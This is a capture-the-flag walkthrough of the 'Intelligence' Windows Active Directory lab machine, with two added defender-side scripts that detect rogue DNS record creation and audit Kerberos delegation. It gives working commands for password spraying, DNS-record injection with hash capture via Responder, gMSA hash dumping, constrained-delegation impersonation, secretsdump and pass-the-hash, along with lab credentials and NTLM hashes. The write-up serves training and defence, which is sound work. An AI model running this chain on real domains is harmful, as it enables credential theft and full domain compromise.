Enumeration
Open Port
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2021-08-06 12:35:56Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default
<STRIPED>
Web Enumeration
As we try to download the documents we notice that the file names are date stamps. Let's find all the valid file names using feroxbuster and then download them. I automated this process…
Create Date Stamp Wordlist
I used the wordlist generator from BruteSploit (GitHub) to produce one entry per day from 2019 to 2021, with "-upload.pdf" appended to each date:

```shell
./wordlist-gen.sh -b 2019-01-01 -e 2021-12-31 -f yyyymmdd -s - -o wordlist.txt -a "-upload.pdf"
```
FeroxBuster
Dumper And Extractor
I wrote two small Python scripts: a dumper to download the PDFs that feroxbuster found, and an extractor to search each PDF for useful information such as a password.

```python
#!/usr/bin/env python3
# dumper.py
import requests

x = ["http://intelligence.htb/documents/2020-01-02-upload.pdf"]
# Above is a representation of what it had. You will have to put the feroxbuster's urls into a list here.
for url in x:
    r = requests.get(url, allow_redirects=True)
    r.raise_for_status()  # skip silently writing an error page as a .pdf
    # save under the last path component, e.g. 2020-01-02-upload.pdf
    with open(url.split('/')[-1], 'wb') as f:
        f.write(r.content)
```

```python
#!/usr/bin/env python3
# extractor.py
import PyPDF2 as x

names = ["2020-01-01-upload.pdf"]
# Above is a representation of what it had. You will have to put the downloaded file's file names.
for i in names:
    with open(i, 'rb') as fileobject:
        # PdfFileReader/getPage/extractText were removed in PyPDF2 3.x; this is the current API
        pdfreader = x.PdfReader(fileobject)
        text = pdfreader.pages[0].extract_text()
        if "password" in text:
            print(text)
            print(i)
```
PDF File Enumeration
I got the default password from one of the PDF files, 2020-06-04-upload.pdf:

```text
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
```
I built a users wordlist from the Creator field in the PDFs' EXIF metadata (values only, one username per line, duplicates removed):

```shell
exiftool -Creator -s3 *.pdf | sort -u > users
```
Foothold
Finding correct Credentials
I ran crackmapexec to try the default password against every user in the list:

```shell
crackmapexec smb intelligence.htb -u users -p "NewIntelligenceCorpUser9876"
```

It returned one valid login:

```text
intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
```
Now let's see what is in the Users share. Inside Tiffany.Molina's Desktop folder we find user.txt. Got our flag!
Privilege Escalation
Injecting a DNS Record Using LDAP
Reading downdetector.ps1 shows that it fetches every DNS record in the zone whose name starts with "web" and requests http://<name> with the running user's default credentials to check whether the site is alive or dead:

```powershell
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
```
So we add a DNS record named web that points at our IP, via LDAP, using dnstool.py, and then start Responder to capture the hash when the script authenticates to us:

```shell
./dnstool.py -u "10.10.10.248\Tiffany.Molina" -p "NewIntelligenceCorpUser9876" 10.10.10.248 -a add -d 10.10.14.24 -r web.intelligence.htb
```
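The record injection above works because, by default, any authenticated domain user may create child objects in an AD-integrated zone, and downdetector.ps1 then trusts whatever name appears there. On the defender's side the creation is visible: with Directory Service Changes auditing enabled and the zone container's SACL auditing object creation, the domain controller logs Security event 5137 ("A directory service object was created") naming the creating account and the new dnsNode. The script below is an added example, not part of this writeup or of any tool it uses; it parses constructed sample events in a simplified key=value form and flags dnsNode objects created under CN=MicrosoftDNS by anything other than a machine account or an allow-listed DNS administrator (the allowlist name is an assumption).

```python
#!/usr/bin/env python3
"""Flag ADIDNS records created by ordinary domain users (added defender-side example)."""
import re
from dataclasses import dataclass

# Constructed sample events, reduced to the fields the check needs.
# Real 5137 events carry these same fields (SubjectUserName, ObjectDN, ObjectClass).
SAMPLE_EVENTS = """\
EventID=5137 SubjectUserName=DC$ ObjectClass=dnsNode ObjectDN=DC=dc,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
EventID=5137 SubjectUserName=Tiffany.Molina ObjectClass=dnsNode ObjectDN=DC=web,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
EventID=5137 SubjectUserName=dnsadmin ObjectClass=dnsNode ObjectDN=DC=printer01,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
EventID=5137 SubjectUserName=Tiffany.Molina ObjectClass=user ObjectDN=CN=Test,CN=Users,DC=intelligence,DC=htb
EventID=5141 SubjectUserName=Tiffany.Molina ObjectClass=dnsNode ObjectDN=DC=web,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb
"""

# Assumption: the accounts that legitimately manage DNS records by hand.
ALLOWED_CREATORS = {"dnsadmin"}


@dataclass
class Finding:
    creator: str
    record_name: str
    zone: str


def parse_event(line):
    """Turn one 'key=value key=value' line into a dict (values contain no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_adidns_node(dn):
    """True when the DN lives under the MicrosoftDNS container of a zone."""
    return "CN=MicrosoftDNS," in dn


def record_name_and_zone(dn):
    """A dnsNode DN looks like DC=<record>,DC=<zone>,CN=MicrosoftDNS,..."""
    parts = dn.split(",")
    return parts[0][3:], parts[1][3:]


def find_suspicious_dns_creations(log_text, allowed=ALLOWED_CREATORS):
    """Return dnsNode creations (event 5137) by non-machine, non-allow-listed accounts."""
    allowed_lc = {a.lower() for a in allowed}
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "5137" or ev.get("ObjectClass") != "dnsNode":
            continue  # only object creation of DNS records is of interest here
        if not is_adidns_node(ev.get("ObjectDN", "")):
            continue
        creator = ev["SubjectUserName"]
        # Machine accounts register their own A records; allow-listed admins are expected.
        if creator.endswith("$") or creator.lower() in allowed_lc:
            continue
        name, zone = record_name_and_zone(ev["ObjectDN"])
        findings.append(Finding(creator, name, zone))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_dns_creations(SAMPLE_EVENTS):
        print(f"ALERT: {f.creator} created DNS record {f.record_name}.{f.zone}")
```

Only the record created by Tiffany.Molina is reported; the DC's own record, the allow-listed admin's record, the non-DNS object and the 5141 deletion event are skipped. In a real deployment the same rule can be tightened to names the monitoring script would act on (here anything matching web*), and the root cause is removed by restricting Create Child rights on the zone and by not calling Invoke-WebRequest with -UseDefaultCredentials against names taken from a writable zone.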
And the hash came in and was CRACKED!

```text
CREDENTIALS: TED.GRAVES:Mr.Teddy
```
Read GMSA Password
```shell
python3 gMSADumper.py -u "TED.GRAVES" -p "Mr.Teddy" -d intelligence.htb
```

```text
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
```

Now we have the NT hash of svc_int$.
Constrained Delegation Exploitation
Following this article
```shell
impacket-GetUserSPNs "intelligence.htb/svc_int$" -request-user UNCONSTRAINED_USER -hashes :5e47bac787e5e1970cf9acdb5b316239
```

That step was done to check whether the account had unconstrained delegation.
Constrained Delegation User Impersonation
```shell
impacket-getST -spn www/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$ -hashes :5e47bac787e5e1970cf9acdb5b316239
```

The above command saves the resulting ticket to a cache file, as in the article. Then I import the Kerberos ticket into my environment, and finally I use secretsdump.py.
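The chain from svc_int$ to Administrator depends on two conditions a defender can audit: a service account holding constrained delegation to an SPN on the domain controller, and a privileged account that is still allowed to be delegated (neither marked "sensitive and cannot be delegated", i.e. the NOT_DELEGATED userAccountControl flag 0x100000, nor a member of Protected Users). The script below is an added example, not part of this writeup or of impacket; it runs over a constructed, simplified export of the relevant LDAP attributes (a real audit would pull samAccountName, userAccountControl, msDS-AllowedToDelegateTo and memberOf with ldapsearch or PowerShell), and the DC hostname list and privileged-account list are assumptions.

```python
#!/usr/bin/env python3
"""Audit Kerberos delegation settings (added defender-side example)."""

# userAccountControl flags (values from the AD schema).
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_NORMAL_ACCOUNT = 0x200

DOMAIN_CONTROLLERS = {"dc.intelligence.htb"}          # assumption: known DC hostnames
PRIVILEGED = {"administrator", "da_ops"}               # assumption: accounts that must never be delegated

# Constructed sample export: samAccountName, userAccountControl,
# msDS-AllowedToDelegateTo and memberOf, reduced to what the checks need.
SAMPLE_ACCOUNTS = [
    {"sam": "svc_int$", "uac": UF_WORKSTATION_TRUST_ACCOUNT,
     "delegate_to": ["WWW/dc.intelligence.htb"], "member_of": []},
    {"sam": "svc_backup", "uac": UF_NORMAL_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "delegate_to": [], "member_of": []},
    {"sam": "Administrator", "uac": UF_NORMAL_ACCOUNT,
     "delegate_to": [], "member_of": []},
    {"sam": "da_ops", "uac": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED,
     "delegate_to": [], "member_of": ["CN=Protected Users,CN=Users,DC=intelligence,DC=htb"]},
    {"sam": "Ted.Graves", "uac": UF_NORMAL_ACCOUNT,
     "delegate_to": [], "member_of": []},
]


def spn_host(spn):
    """Extract the host from 'service/host[:port]' (case-folded)."""
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.split(":", 1)[0].lower()


def delegation_findings(accounts, dcs=DOMAIN_CONTROLLERS):
    """List (account, description) pairs for every delegation right found."""
    out = []
    for a in accounts:
        uac = a["uac"]
        if uac & UF_TRUSTED_FOR_DELEGATION:
            out.append((a["sam"], "unconstrained delegation"))
        for spn in a.get("delegate_to", []):
            # Delegation to a DC-hosted service lets the account impersonate users to the DC itself.
            severity = "HIGH" if spn_host(spn) in dcs else "MEDIUM"
            note = f"{severity}: constrained delegation to {spn}"
            if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
                note += " with protocol transition"
            out.append((a["sam"], note))
    return out


def is_delegation_protected(account):
    """True when the account cannot be impersonated through delegation."""
    if account["uac"] & UF_NOT_DELEGATED:
        return True
    return any(g.lower().startswith("cn=protected users,") for g in account.get("member_of", []))


def impersonable_privileged(accounts, privileged=PRIVILEGED):
    """Privileged accounts that a delegating service could still impersonate."""
    return [a["sam"] for a in accounts
            if a["sam"].lower() in privileged and not is_delegation_protected(a)]


if __name__ == "__main__":
    for sam, note in delegation_findings(SAMPLE_ACCOUNTS):
        print(f"{sam}: {note}")
    for sam in impersonable_privileged(SAMPLE_ACCOUNTS):
        print(f"{sam}: privileged account is delegatable; set NOT_DELEGATED or add to Protected Users")
```

On the constructed data the script reports svc_int$'s HIGH-severity delegation to the DC, svc_backup's unconstrained delegation, and Administrator as still impersonable, while da_ops is protected by both controls. Either control on the Administrator account would have stopped the getST impersonation step above from yielding a usable ticket.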
Got the Administrator hash:

```text
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3:::
```

We will use the Administrator hash with psexec:

```shell
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9075113fe16cf74f7c0f9b27e882dad3 [email protected]
```